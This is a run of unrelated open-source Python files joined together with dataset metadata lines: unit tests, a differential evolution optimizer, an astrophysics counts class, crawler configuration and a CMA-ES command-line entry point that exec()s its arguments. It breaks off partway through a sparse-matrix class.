expected = array.array("f", range(10))
self.assertEqual(result, expected)
result = seq.range(10).map(lambda x: x ** 2).toarray()
expected = array.array("f", [i ** 2 for i in range(10)])
self.assertEqual(result, expected)
# a more complex example combining all above
@extend()
def sum_pair(it):
return (i[0] + i[1] for i in it)
result = (
seq.range(100).my_filter(85).my_zip().sum_pair().square_parallel().toarray()
)
expected = array.array(
"f",
list(
map(
lambda x: (x[0] + x[1]) ** 2,
map(lambda x: (x, x), filter(lambda x: x > 85, range(100))),
)
),
)
self.assertEqual(result, expected)
class TestParallelPipeline(TestPipeline):
def setUp(self):
self.seq = pseq
| 2.46875 | 2 |
tests/test_git_commit_one_file.py | mubashshirjamal/code | 1,582 | 11009 | <reponame>mubashshirjamal/code
# -*- coding: utf-8 -*-
import os
from vilya.models.project import CodeDoubanProject
from vilya.models import git
from tests.base import TestCase
from tests.utils import mkdtemp
from vilya.libs import gyt
from vilya.libs.permdir import get_repo_root
class TestGit(TestCase):
@property
def u(self):
return self.addUser()
def _path(self, name):
return os.path.join(get_repo_root(), '%s.git' % name)
def _path_work_tree(self, name):
return os.path.join(get_repo_root(), '%s.work_tree' % name)
def _repo(self, name, bare=True):
git_path = self._path(name)
if bare:
work_tree_path = None
else:
work_tree_path = self._path_work_tree(name)
if not os.path.exists(work_tree_path):
os.mkdir(work_tree_path)
try:
CodeDoubanProject.create_git_repo(git_path)
except:
pass
repo = git.GitRepo(git_path, work_tree=work_tree_path)
return repo
def _commit(self, repo, filename, content='testcontent',
message='testmessage'):
# TODO allow commiting more than one file
assert os.path.exists(repo.work_tree), \
"repo.work_tree must exist, check if repo has been created with bare=False" # noqa
path = os.path.join(repo.work_tree, filename)
dir_ = os.path.dirname(path)
if not os.path.exists(dir_):
os.makedirs(os.path.dirname(path))
f = open(path, 'w')
f.write(content)
f.close()
rep2 = gyt.repo(repo.path, repo.work_tree, bare=False)
rep2.call(['add', filename])
rep2.call(['commit', filename, '-m', message], _env=self.env_for_git)
return gyt.repo(repo.path).sha()
def test_simple_commit(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'testfile1', 'content1', 'msg1')
src = repo.get_src('testfile1')
assert src == ('blob', u'content1')
repo.commit_one_file('testfile1', 'content1 modified',
'change1', self.u, orig_hash=hash('content1'))
src = repo.get_src('testfile1')
assert src == ('blob', u'content1 modified')
def test_simple_commit_do_not_delete_other_files(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'testfile1', 'content1', 'msg1')
self._commit(repo, 'testfile2', 'content2', 'msg2')
repo.commit_one_file('testfile1', 'content1 modified',
'change1', self.u, orig_hash=hash('content1'))
src = repo.get_src('testfile1')
assert src == ('blob', u'content1 modified')
type_, files = repo.get_src('')
assert any(d['path'] == 'testfile2' for d in files), \
"testfile2 should exists in root tree"
src = repo.get_src('testfile2')
assert src == ('blob', u'content2')
def test_commit_in_inner_directory(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'test/file1', 'content1', 'msg1')
src = repo.get_src('test/file1')
assert src == ('blob', u'content1')
repo.commit_one_file('test/file1', 'content1 modified',
'change1', self.u, orig_hash=hash('content1'))
src = repo.get_src('test/file1')
assert src == ('blob', u'content1 modified')
def test_create_file(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'file1', 'content1', 'msg1')
repo.commit_one_file(
'file2', 'content2 created', 'create1', self.u)
assert repo.cat('HEAD:file1') == 'content1'
assert repo.cat('HEAD:file2') == 'content2 created'
def test_create_first_file(self):
repo = self._repo('test', bare=False)
repo.commit_one_file(
'file1', 'content1 created', 'create1', self.u)
assert repo.cat('HEAD:file1') == 'content1 created'
def test_create_first_file_and_more(self):
repo = self._repo('test', bare=False)
repo.commit_one_file(
'file1', 'content1 created', 'create1', self.u)
repo.commit_one_file(
'file2', 'content2 created', 'create2', self.u)
repo.commit_one_file(
'file3', 'content3 created', 'create3', self.u)
repo.commit_one_file(
'file4', 'content4 created', 'create4', self.u)
assert repo.cat('HEAD:file1') == 'content1 created'
assert repo.cat('HEAD:file2') == 'content2 created'
assert repo.cat('HEAD:file3') == 'content3 created'
assert repo.cat('HEAD:file4') == 'content4 created'
def test_commit_file_on_dirty_index(self):
repo = self._repo('test', bare=False)
repo.commit_one_file(
'file1', 'content1 created', 'create1', self.u)
repo.commit_one_file(
'file2', 'content2 created', 'create2', self.u)
repo.commit_one_file(
'file1', 'content1 modified', 'modify1', self.u)
# Now artificially rewind the index tree state
repo.call('read-tree HEAD^')
repo.commit_one_file(
'file2', 'content2 modified', 'modify2', self.u)
# the latest commit should not have anything related to file1
assert 'file1' not in repo.call('log -p -n1')
def test_create_file_in_dir(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'test/file1', 'content1', 'msg1')
repo.commit_one_file(
'test/file2', 'content2 created', 'create1', self.u)
assert repo.cat('HEAD:test/file1') == 'content1'
assert repo.cat('HEAD:test/file2') == 'content2 created'
def test_simple_commit_in_branch(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'testfile1', 'content1', 'msg1')
tmp_branch = repo.temp_branch_name()
repo.commit_one_file('testfile1', 'content1 modified', 'change1',
self.u, orig_hash=hash('content1'),
branch=tmp_branch)
with mkdtemp() as tmpdir:
gyt.call(['git', 'clone', repo.path, tmpdir])
repo_check = gyt.repo(tmpdir, bare=False)
src = repo_check.call('show HEAD:testfile1')
assert src == u'content1'
repo_check.call('checkout master')
src = repo_check.call('show HEAD:testfile1')
assert src == u'content1'
repo_check.call('checkout %s' % tmp_branch)
src = repo_check.call('show HEAD:testfile1')
assert src == u'content1 modified'
repo_check.call('checkout master')
src = repo_check.call('show HEAD:testfile1')
assert src == u'content1'
def test_simple_commit_in_branch_in_subdir(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'test/file1', 'content1', 'msg1')
tmp_branch = repo.temp_branch_name()
repo.commit_one_file('test/file1', 'content1 modified', 'change1',
self.u, orig_hash=hash('content1'),
branch=tmp_branch)
with mkdtemp() as tmpdir:
gyt.call(['git', 'clone', repo.path, tmpdir])
repo_check = gyt.repo(tmpdir, bare=False)
src = repo_check.call('show HEAD:test/file1')
assert src == u'content1'
repo_check.call('checkout master')
src = repo_check.call('show HEAD:test/file1')
assert src == u'content1'
repo_check.call('checkout %s' % tmp_branch)
src = repo_check.call('show HEAD:test/file1')
assert src == u'content1 modified'
repo_check.call('checkout master')
src = repo_check.call('show HEAD:test/file1')
assert src == u'content1'
def test_simple_commit_in_branch_creates_branch(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'testfile1', 'content1', 'msg1')
assert repo.get_branches() == ['master']
tmp_branch = repo.temp_branch_name()
repo.commit_one_file('testfile1', 'content1 modified', 'change1',
self.u, orig_hash=hash('content1'),
branch=tmp_branch)
assert repo.get_branches() == ['master', tmp_branch]
def test_simple_commit_in_branch_and_delete_branch(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'testfile1', 'content1', 'msg1')
tmp_branch = repo.temp_branch_name()
repo.commit_one_file('testfile1', 'content1 modified', 'change1',
self.u, orig_hash=hash('content1'),
branch=tmp_branch)
assert tmp_branch in repo.get_branches()
repo.remove_temp_branch(tmp_branch)
assert tmp_branch not in repo.get_branches()
assert repo.get_branches() == ['master']
def test_simple_commit_in_another_branch(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'testfile1', 'content1', 'msg1')
branch = 'mybranch'
repo.commit_one_file('testfile1', 'content1 modified', 'change1',
self.u, orig_hash=hash('content1'), branch=branch)
assert branch in repo.get_branches()
assert set(repo.get_branches()) == set(['master', branch])
| 2.21875 | 2 |
py/desitarget/train/data_preparation/PredCountsFromQLF_ClassModule.py | echaussidon/desitarget | 13 | 11010 | <reponame>echaussidon/desitarget
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
import re
import numpy as np
from scipy.interpolate import interp2d
from scipy.interpolate import interp1d
class PredCountsFromQLF_Class():
def __init__(self):
self.QLF_OK = False
self.EFF_OK = False
self.QLF_EFF_OK = False
# QLF
self.QLF_nz = 0
self.QLF_stepz = 0
# self.QLF_tabz = None
self.QLF_zlimit = None
self.QLF_nmag = 0
self.QLF_stepmag = 0
self.QLF_tabmag = None
self.QLF_maglimit = None
self.QLF_dNdzdmag = None
self.QLF_Ndzdmag = None
# EFF
self.EFF_zlimit = None
self.EFF_maglimit = None
self.EFF_dzdmag = None
# QLF_EFF
self.QLF_EFF_zlimit = None
self.QLF_EFF_maglimit = None
self.interpEFF_dzdmag = None
self.interpQLF_dNdzdmag = None
self.interpQLF_EFF_dNdzdmag = None
self.QLF_EFF_dNdz = None
self.QLF4Compl_dNdz = None
self.Compl_dz = None
self.QLF_EFF_dNdmag = None
self.QLF4Compl_dNdmag = None
self.Compl_dmag = None
self.QLF_EFF_dNdzdmag = None
self.QLF4Compl_dNdzdmag = None
self.Compl_dzdmag = None
def LoadQLF_Data(self, fpn_QLF_Data, mMzred=np.array([0., 6.]), skyArea=10000.):
# Data loading in "dataStr"
dataStr = np.loadtxt(fpn_QLF_Data, dtype=str, delimiter='\n')
self.QLF_nz = len(re.findall(r'\d+(?:\.\d+)?', dataStr[0])) - 1
self.QLF_nmag = len(dataStr)
# ZRED
self.QLF_zlimit = np.linspace(mMzred[0], mMzred[1], self.QLF_nz + 1, endpoint=True)
self.QLF_stepz = self.QLF_zlimit[1] - self.QLF_zlimit[0]
# self.QLF_tabz = self.QLF_zlimit[0:-1] + self.QLF_stepz / 2.
self.QLF_tabmag = np.zeros(self.QLF_nmag)
self.QLF_dNdzdmag = np.zeros((self.QLF_nmag + 1, self.QLF_nz + 1))
for nL, line in enumerate(dataStr):
dNdzdmag = re.findall(r'\d+(?:\.\d+)?', line)
dNdzdmag = np.asarray(dNdzdmag).astype(np.float)
self.QLF_tabmag[nL] = dNdzdmag[0]
self.QLF_dNdzdmag[nL + 1, 1:] = dNdzdmag[1:]
self.QLF_stepmag = self.QLF_tabmag[1] - self.QLF_tabmag[0]
# MAG
self.QLF_maglimit = np.zeros(self.QLF_nmag + 1)
self.QLF_maglimit[0:-1] = self.QLF_tabmag - self.QLF_stepmag / 2.
self.QLF_maglimit[-1] = self.QLF_maglimit[-2] + self.QLF_stepmag
self.QLF_dNdzdmag /= skyArea
self.QLF_Ndzdmag = np.cumsum(np.cumsum(
self.QLF_dNdzdmag, axis=0), axis=1)
self.QLF_OK = True
self.QLF_EFF_OK = False
def LoadEffData(self, EFFdata, EFFzlimit, EFFmaglimit):
self.EFF_dzdmag = np.copy(EFFdata)
self.EFF_zlimit = np.copy(EFFzlimit)
self.EFF_maglimit = np.copy(EFFmaglimit)
self.EFF_OK = True
self.QLF_EFF_OK = False
def PrelOpFunc(self):
if self.QLF_OK & self.EFF_OK & (not self.QLF_EFF_OK):
# QLF_EFF_zlimit
self.QLF_EFF_zlimit = np.unique(np.hstack((self.QLF_zlimit, self.EFF_zlimit)))
maxQLF_EFF_zlimit = min(float(np.max(self.QLF_zlimit)),
float(np.max(self.EFF_zlimit)))
minQLF_EFF_zlimit = max(float(np.min(self.QLF_zlimit)),
float(np.min(self.EFF_zlimit)))
test = (self.QLF_EFF_zlimit >= minQLF_EFF_zlimit) & \
(self.QLF_EFF_zlimit <= maxQLF_EFF_zlimit)
self.QLF_EFF_zlimit = self.QLF_EFF_zlimit[test]
# QLF_EFFmaglimit
self.QLF_EFF_maglimit = np.unique(
np.hstack((self.QLF_maglimit,
self.EFF_maglimit)))
maxQLF_EFF_maglimit = min(float(np.max(self.QLF_maglimit)),
float(np.max(self.EFF_maglimit)))
minQLF_EFF_maglimit = max(float(np.min(self.QLF_maglimit)),
float(np.min(self.EFF_maglimit)))
test = (self.QLF_EFF_maglimit >= minQLF_EFF_maglimit) & \
(self.QLF_EFF_maglimit <= maxQLF_EFF_maglimit)
self.QLF_EFF_maglimit = self.QLF_EFF_maglimit[test]
xnew = self.QLF_EFF_zlimit
ynew = self.QLF_EFF_maglimit
# EFF
x = self.EFF_zlimit.flatten()
y = self.EFF_maglimit.flatten()
z = self.EFF_dzdmag
# ==============================================================================
# f2d_EFF = interp2d(x, y, z, kind = 'linear',
# copy = True, bounds_error = True)
# interpEFF_dzdmag = f2d_EFF(xnew, ynew)
# ==============================================================================
interpXinds = np.digitize(xnew, x, right=True) - 1
interpXinds = np.maximum(interpXinds, 0)
interpYinds = np.digitize(ynew, y, right=True) - 1
interpYinds = np.maximum(interpYinds, 0)
interpXYgridInds = np.meshgrid(interpXinds, interpYinds)
self.interpEFF_dzdmag = z[interpXYgridInds[1],
interpXYgridInds[0]]
# QLF
x = self.QLF_zlimit.flatten()
y = self.QLF_maglimit.flatten()
z = self.QLF_Ndzdmag
f2d_QLF = interp2d(x, y, z, kind='linear', copy=True, bounds_error=True)
interpQLF_Ndzdmag = f2d_QLF(xnew, ynew)
interpQLF_dNdzdmag = np.copy(interpQLF_Ndzdmag)
interpQLF_dNdzdmag[:, 1:] -= np.copy(interpQLF_dNdzdmag[:, :-1])
interpQLF_dNdzdmag[1:, :] -= np.copy(interpQLF_dNdzdmag[:-1, :])
self.interpQLF_dNdzdmag = interpQLF_dNdzdmag
interpQLF_EFF_dNdzdmag = np.zeros(self.interpQLF_dNdzdmag.shape)
interpQLF_EFF_dNdzdmag = self.interpEFF_dzdmag * self.interpQLF_dNdzdmag
self.interpQLF_EFF_dNdzdmag = interpQLF_EFF_dNdzdmag
self.QLF_EFF_OK = True
def ZREDComplEvalFunc(self, zlimit):
if self.QLF_EFF_OK:
xnew = self.QLF_EFF_zlimit
assert(np.min(zlimit) >= np.min(xnew))
assert(np.max(zlimit) <= np.max(xnew))
interpQLF_dNdz = np.sum(self.interpQLF_dNdzdmag, axis=0)
interpQLF_Ndz = np.cumsum(interpQLF_dNdz)
# QLF_EFF dNdz
interpQLF_EFF_dNdz = np.sum(self.interpQLF_EFF_dNdzdmag, axis=0)
interpQLF_EFF_Ndz = np.cumsum(interpQLF_EFF_dNdz)
f1d_QLF_EFF = interp1d(xnew, interpQLF_EFF_Ndz, kind='linear', copy=True, bounds_error=True)
f1d_QLF = interp1d(xnew, interpQLF_Ndz, kind='linear', copy=True, bounds_error=True)
self.QLF_EFF_dNdz = f1d_QLF_EFF(zlimit)
self.QLF_EFF_dNdz[1:] -= np.copy(self.QLF_EFF_dNdz[:-1])
self.QLF4Compl_dNdz = f1d_QLF(zlimit)
self.QLF4Compl_dNdz[1:] -= np.copy(self.QLF4Compl_dNdz[:-1])
self.Compl_dz = self.QLF_EFF_dNdz[1:] / self.QLF4Compl_dNdz[1:]
self.Compl_dz[np.isnan(self.Compl_dz)] = 0.
return self.Compl_dz
def RComplEvalFunc(self, maglimit):
if self.QLF_EFF_OK:
ynew = self.QLF_EFF_maglimit
assert(np.min(maglimit) >= np.min(ynew))
assert(np.max(maglimit) <= np.max(ynew))
interpQLF_dNdmag = np.sum(self.interpQLF_dNdzdmag, axis=1)
interpQLF_Ndmag = np.cumsum(interpQLF_dNdmag)
# QLF_EFF dNdmag
interpQLF_EFF_dNdmag = np.sum(self.interpQLF_EFF_dNdzdmag, axis=1)
interpQLF_EFF_Ndmag = np.cumsum(interpQLF_EFF_dNdmag)
f1d_QLF_EFF = interp1d(ynew, interpQLF_EFF_Ndmag, kind='linear', copy=True, bounds_error=True)
f1d_QLF = interp1d(ynew, interpQLF_Ndmag, kind='linear', copy=True, bounds_error=True)
self.QLF_EFF_dNdmag = f1d_QLF_EFF(maglimit)
self.QLF_EFF_dNdmag[1:] -= np.copy(self.QLF_EFF_dNdmag[:-1])
self.QLF4Compl_dNdmag = f1d_QLF(maglimit)
self.QLF4Compl_dNdmag[1:] -= np.copy(self.QLF4Compl_dNdmag[:-1])
self.Compl_dmag = self.QLF_EFF_dNdmag[1:] / self.QLF4Compl_dNdmag[1:]
self.Compl_dmag[np.isnan(self.Compl_dmag)] = 0.
return self.Compl_dmag
def R_ZREDComplEvalFunc(self, zlimit, maglimit):
if self.QLF_EFF_OK:
xnew = self.QLF_EFF_zlimit
assert(np.min(zlimit) >= np.min(xnew))
assert(np.max(zlimit) <= np.max(xnew))
ynew = self.QLF_EFF_maglimit
assert(np.min(maglimit) >= np.min(ynew))
assert(np.max(maglimit) <= np.max(ynew))
interpQLF_EFF_Ndzdmag = np.cumsum(np.cumsum(self.interpQLF_EFF_dNdzdmag, axis=0), axis=1)
f2d_QLF_EFF = interp2d(xnew, ynew, interpQLF_EFF_Ndzdmag, kind='linear', copy=True, bounds_error=True)
QLF_EFF4Compl_Ndzdmag = f2d_QLF_EFF(zlimit, maglimit)
QLF_EFF4Compl_dNdzdmag = np.copy(QLF_EFF4Compl_Ndzdmag)
QLF_EFF4Compl_dNdzdmag[:, 1:] -= np.copy(QLF_EFF4Compl_dNdzdmag[:, :-1])
QLF_EFF4Compl_dNdzdmag[1:, :] -= np.copy(QLF_EFF4Compl_dNdzdmag[:-1, :])
self.QLF_EFF4Compl_dNdzdmag = QLF_EFF4Compl_dNdzdmag
# QLF
interpQLF_Ndzdmag = np.cumsum(np.cumsum(self.interpQLF_dNdzdmag, axis=0), axis=1)
f2d_QLF = interp2d(xnew, ynew, interpQLF_Ndzdmag, kind='linear', copy=True, bounds_error=True)
QLF4Compl_Ndzdmag = f2d_QLF(zlimit, maglimit)
QLF4Compl_dNdzdmag = np.copy(QLF4Compl_Ndzdmag)
QLF4Compl_dNdzdmag[:, 1:] -= np.copy(QLF4Compl_dNdzdmag[:, :-1])
QLF4Compl_dNdzdmag[1:, :] -= np.copy(QLF4Compl_dNdzdmag[:-1, :])
self.QLF4Compl_dNdzdmag = QLF4Compl_dNdzdmag
self.Compl_dzdmag = self.QLF_EFF4Compl_dNdzdmag[1:, 1:] / self.QLF4Compl_dNdzdmag[1:, 1:]
self.Compl_dzdmag[np.isnan(self.Compl_dzdmag)] = 0.
return self.Compl_dzdmag
def R_ZRED_EffVarEvalFunc(self, OBJ_QSO_dNdzdmag):
self.EffVar4Compl_dzdmag = None
self.Eff4Compl_dzdmag = np.copy(self.Compl_dzdmag)
if True:
self.EffVar4Compl_dzdmag = self.Eff4Compl_dzdmag * (1. - self.Eff4Compl_dzdmag)
self.EffVar4Compl_dzdmag /= OBJ_QSO_dNdzdmag
self.EffVar4Compl_dzdmag[OBJ_QSO_dNdzdmag == 0.] = 0.
else:
self.Count4Complt_Ndzdmag = self.Eff4Compl_dzdmag * OBJ_QSO_dNdzdmag
self.EffVar4Compl_dzdmag = OBJ_QSO_dNdzdmag - self.Count4Complt_Ndzdmag + 1.
self.EffVar4Compl_dzdmag *= self.Count4Complt_Ndzdmag + 1.
self.EffVar4Compl_dzdmag /= (OBJ_QSO_dNdzdmag + 2)**2 * (OBJ_QSO_dNdzdmag + 3)
self.EffVar4Compl_dzdmag[OBJ_QSO_dNdzdmag == 0.] = 0.
return self.EffVar4Compl_dzdmag
def ZRED_EffVarEvalFunc(self):
self.EffVar4Compl_dz = self.EffVar4Compl_dzdmag * (self.QLF4Compl_dNdzdmag[1:, 1:])**2
self.EffVar4Compl_dz = np.sum(self.EffVar4Compl_dz, axis=0)
tmp_var = np.sum(self.QLF4Compl_dNdzdmag[1:, 1:], axis=0)**2
self.EffVar4Compl_dz /= tmp_var
self.EffVar4Compl_dz[tmp_var == 0.] = 0.
return self.EffVar4Compl_dz
def R_EffVarEvalFunc(self):
self.EffVar4Compl_dmag = self.EffVar4Compl_dzdmag * (self.QLF4Compl_dNdzdmag[1:, 1:])**2
self.EffVar4Compl_dmag = np.sum(self.EffVar4Compl_dmag, axis=1)
tmp_var = np.sum(self.QLF4Compl_dNdzdmag[1:, 1:], axis=1)**2
self.EffVar4Compl_dmag /= tmp_var
self.EffVar4Compl_dmag[tmp_var == 0.] = 0.
return self.EffVar4Compl_dmag
| 1.914063 | 2 |
safe_control_gym/controllers/__init__.py | gokhanalcan/safe-control-gym | 0 | 11011 | """Register controllers.
"""
from safe_control_gym.utils.registration import register
register(id="mpc",
entry_point="safe_control_gym.controllers.mpc.mpc:MPC",
config_entry_point="safe_control_gym.controllers.mpc:mpc.yaml")
register(id="linear_mpc",
entry_point="safe_control_gym.controllers.mpc.linear_mpc:LinearMPC",
config_entry_point="safe_control_gym.controllers.mpc:linear_mpc.yaml")
register(id="gp_mpc",
entry_point="safe_control_gym.controllers.mpc.gp_mpc:GPMPC",
config_entry_point="safe_control_gym.controllers.mpc:gp_mpc.yaml")
register(id="mpsc",
entry_point="safe_control_gym.controllers.mpsc.mpsc:MPSC",
config_entry_point="safe_control_gym.controllers.mpsc:mpsc.yaml")
register(id="ppo",
entry_point="safe_control_gym.controllers.ppo.ppo:PPO",
config_entry_point="safe_control_gym.controllers.ppo:ppo.yaml")
register(id="safe_explorer_ppo",
entry_point="safe_control_gym.controllers.safe_explorer.safe_ppo:SafeExplorerPPO",
config_entry_point="safe_control_gym.controllers.safe_explorer:safe_ppo.yaml")
| 1.429688 | 1 |
tests/plot_profile/test_utils.py | mizeller/plot_profile | 0 | 11012 | """Test module ``plot_profile/utils.py``."""
# Standard library
import logging
# First-party
from plot_profile.utils import count_to_log_level
def test_count_to_log_level():
assert count_to_log_level(0) == logging.ERROR
assert count_to_log_level(1) == logging.WARNING
assert count_to_log_level(2) == logging.INFO
assert count_to_log_level(3) == logging.DEBUG
| 2.015625 | 2 |
spider/utilities/util_config.py | YunofHD/PSpider | 0 | 11013 | <reponame>YunofHD/PSpider<gh_stars>0
# _*_ coding: utf-8 _*_
"""
util_config.py by xianhu
"""
__all__ = [
"CONFIG_FETCH_MESSAGE",
"CONFIG_PARSE_MESSAGE",
"CONFIG_MESSAGE_PATTERN",
"CONFIG_URL_LEGAL_PATTERN",
"CONFIG_URL_ILLEGAL_PATTERN",
]
# define the structure of message, used in Fetcher and Parser
CONFIG_FETCH_MESSAGE = "priority=%s, keys=%s, deep=%s, repeat=%s, url=%s"
CONFIG_PARSE_MESSAGE = "priority=%s, keys=%s, deep=%s, url=%s"
CONFIG_MESSAGE_PATTERN = r"priority=(?P<priority>\d+),\s*keys=(?P<keys>.+?),\s*deep=(?P<deep>\d+),\s*(repeat=(?P<repeat>\d+),\s*)?url=(?P<url>.+)$"
# define url_legal_pattern and url_illegal_pattern
CONFIG_URL_LEGAL_PATTERN = r"^https?:[^\s]+?\.[^\s]+?"
CONFIG_URL_ILLEGAL_PATTERN = r"\.(cab|iso|zip|rar|tar|gz|bz2|7z|tgz|apk|exe|app|pkg|bmg|rpm|deb|dmg|jar|jad|bin|msi|" \
"pdf|doc|docx|xls|xlsx|ppt|pptx|txt|md|odf|odt|rtf|py|java|c|cc|js|css|log|csv|tsv|" \
"jpg|jpeg|png|gif|bmp|xpm|xbm|ico|drm|dxf|eps|psd|pcd|pcx|tif|tiff|" \
"mp3|mp4|swf|mkv|avi|flv|mov|wmv|wma|3gp|mpg|mpeg|mp4a|wav|ogg|rmvb)$"
| 1.789063 | 2 |
modcma/__main__.py | IOHprofiler/ModularCMAES | 2 | 11014 | """Allows the user to call the library as a cli-module."""
from argparse import ArgumentParser
from .modularcmaes import evaluate_bbob
parser = ArgumentParser(description="Run single function CMAES")
parser.add_argument(
"-f", "--fid", type=int, help="bbob function id", required=False, default=5
)
parser.add_argument(
"-d", "--dim", type=int, help="dimension", required=False, default=5
)
parser.add_argument(
"-i",
"--iterations",
type=int,
help="number of iterations per agent",
required=False,
default=50,
)
parser.add_argument(
"-l", "--logging", required=False, action="store_true", default=False
)
parser.add_argument("-L", "--label", type=str, required=False, default="")
parser.add_argument("-s", "--seed", type=int, required=False, default=42)
parser.add_argument("-p", "--data_folder", type=str, required=False)
parser.add_argument("-a", "--arguments", nargs="+", required=False)
args = vars(parser.parse_args())
for arg in args.pop("arguments") or []:
# pylint: disable=exec-used
exec(arg, None, args)
evaluate_bbob(**args)
| 2.953125 | 3 |
src/rto/optimization/solvers/de.py | vicrsp/rto | 0 | 11015 | <filename>src/rto/optimization/solvers/de.py
import numpy as np
class DifferentialEvolution:
def __init__(self, lb, ub, mutation_prob=0.5, pop_size=10, max_generations=100, de_type='rand/1/bin', callback=None):
self.lb = np.asarray(lb).reshape(1, -1)
self.ub = np.asarray(ub).reshape(1, -1)
self.population_size = pop_size
self.max_generations = max_generations
self.num_variables = len(lb)
self.mutation_prob = mutation_prob
self.callback = callback
self.base, self.d, self.rec = de_type.split('/')
self.norm_lb = self.normalize(self.lb).flatten()
self.norm_ub = self.normalize(self.ub).flatten()
self.reset()
def reset(self):
self.fobj_evals = 0
self.population_fobj = []
self.best_objective = np.Infinity
self.best_solution = []
def normalize(self, x):
norm_x = np.zeros_like(x)
for i in range(x.shape[0]):
norm_x[i, :] = 100 * (x[i] - self.lb) / (self.ub - self.lb)
return norm_x
def denormalize(self, x):
xr = x.reshape(-1, self.num_variables)
denorm_x = np.zeros_like(xr)
for i in range(xr.shape[0]):
denorm_x[i, :] = xr[i] * (self.ub - self.lb) / 100 + self.lb
return denorm_x
def initialize_population(self):
pop_size = (self.population_size, self.num_variables)
self.population = np.random.uniform(
low=self.norm_lb, high=self.norm_ub, size=pop_size)
self.initial_population = self.population
def evaluate_population_cost(self, population):
pop_fobj = []
pop_g = []
# Calculating the fitness value of each solution in the current population.
for sol in population:
cost, g = self.eval_objective(sol)
if((cost < self.best_objective) & (not np.any(g > 0))):
self.best_objective = cost
self.best_solution = sol
pop_fobj.append(cost)
pop_g.append(g)
pop_fobj = np.array(pop_fobj)
pop_g = np.asarray(pop_g)
self.fobj_evals = self.fobj_evals + pop_fobj.shape[0]
self.population_fobj = pop_fobj
self.population_g = pop_g
if(self.callback != None):
self.callback(self.denormalize(population), pop_fobj, pop_g)
return pop_fobj, pop_g
def select_base_vector(self, population, cost):
if(self.base == 'rand'):
r1 = np.random.randint(0, self.population_size)
return r1, population[r1]
elif(self.base == 'mean'):
return None, np.mean(population, axis=0)
elif(self.base == 'best'):
best_idx = np.argmin(cost)
return None, population[best_idx]
else:
raise ValueError('Base={} is not implemented!'.format(self.base))
def select_difference_vector(self, r1, population):
if(self.d == "1"):
r2 = np.random.randint(0, self.population_size)
if(r1 != None):
while(r2 == r1):
r2 = np.random.randint(0, self.population_size)
r3 = np.random.randint(0, self.population_size)
if(r1 != None):
while(r3 == r1 | r3 == r2):
r3 = np.random.randint(0, self.population_size)
return population[r2] - population[r3]
else:
raise ValueError(
'd={} is not implemented!'.format(self.d))
def select_scale_factor(self):
return np.random.rand() * 0.5 + 0.5 # U(0.5, 1.0)
def mutate(self, target, scale_factor, difference):
return target + scale_factor * difference
def recombine(self, v, x):
if (self.rec == "bin"):
u_i = []
for i, v_i in enumerate(v):
u_j = []
delta = np.random.randint(0, self.num_variables)
for j in range(self.num_variables):
randnum = np.random.rand()
if((randnum <= self.mutation_prob) | (j == delta)):
u_j.append(v_i[j])
else:
u_j.append(x[i, j])
u_i.append(u_j)
return np.asarray(u_i)
else:
raise ValueError(
'Recombination={} is not implemented!'.format(self.rec))
def validate_bounds(self, x):
xc = []
for i, value in enumerate(x):
if((value < self.norm_lb[i]) | (value > self.norm_ub[i])):
# replace the variable by a random value inside the bounds
xc.append(np.random.rand() *
(self.norm_ub[i] - self.norm_lb[i]) + self.norm_lb[i])
else:
xc.append(value)
return np.asarray(xc)
def eval_objective(self, x):
cost, g = self.fobj(self.denormalize(x).flatten())
return cost, np.asarray(g)
def select_survivors(self, u, x, fx, gx):
survivors = []
for i in range(self.population_size):
u_i = self.validate_bounds(u[i])
gx_i = gx[i]
fx_i = fx[i]
fu, gu = self.eval_objective(u_i)
is_valid = (fu <= fx_i)
# only use the rule for restricted problems
if(len(gu) > 0):
rule1 = np.all(gu <= 0) & np.all(gx_i <= 0) & (fu <= fx_i)
rule2 = np.all(gu <= 0) & np.any(gx_i > 0)
rule3 = np.any(gu > 0) & np.all(np.maximum(gu, np.zeros_like(
gu)) <= np.maximum(gx_i, np.zeros_like(gx_i)))
is_valid = rule1 | rule2 | rule3
if(is_valid):
survivors.append(u_i)
else:
survivors.append(x[i])
return np.asarray(survivors)
def run(self, func, debug=False):
self.reset()
self.fobj = func
self.initialize_population()
for i in range(self.max_generations):
fobj, g = self.evaluate_population_cost(self.population)
v = []
# use penalization for base vector selection only
# fobj_penalized = fobj + 1000 * np.maximum(np.zeros(self.population_size), np.max(np.asarray(g), axis=1))
for _ in range(self.population_size):
r1, base = self.select_base_vector(self.population, None)
difference = self.select_difference_vector(r1, self.population)
scale_factor = self.select_scale_factor()
v.append(self.mutate(base, scale_factor, difference))
v = np.asarray(v)
u = self.recombine(v, self.population)
self.population = self.select_survivors(
u, self.population, fobj, g)
# if(debug == True):
# print('Progress: {:.2f}%'.format(
# 100 * i / self.max_generations))
if((debug == True) & (self.best_objective != np.Infinity)):
print('Best fobj: {}'.format(self.best_objective))
# print('Best sol: {}'.format(
# self.denormalize(self.best_solution)))
if(self.best_objective != np.Infinity):
return self.best_objective, self.denormalize(self.best_solution).flatten()
else:
return np.Infinity, None
| 2.671875 | 3 |
openmdao/matrices/csr_matrix.py | onodip/OpenMDAO | 0 | 11016 | """Define the CSRmatrix class."""
import numpy as np
from scipy.sparse import coo_matrix
from six import iteritems
from openmdao.matrices.coo_matrix import COOMatrix
class CSRMatrix(COOMatrix):
"""
Sparse matrix in Compressed Row Storage format.
"""
def _build(self, num_rows, num_cols):
"""
Allocate the matrix.
Parameters
----------
num_rows : int
number of rows in the matrix.
num_cols : int
number of cols in the matrix.
"""
data, rows, cols = self._build_sparse(num_rows, num_cols)
# get a set of indices that sorts into row major order
srtidxs = np.lexsort((cols, rows))
data = data[srtidxs]
rows = rows[srtidxs]
cols = cols[srtidxs]
# now sort these back into ascending order (our original stacked order)
# so in _update_submat() we can just extract the individual index
# arrays that will map each block into the combined data array.
revidxs = np.argsort(srtidxs)
metadata = self._metadata
for key, (ind1, ind2, idxs, jac_type, factor) in iteritems(metadata):
if idxs is None:
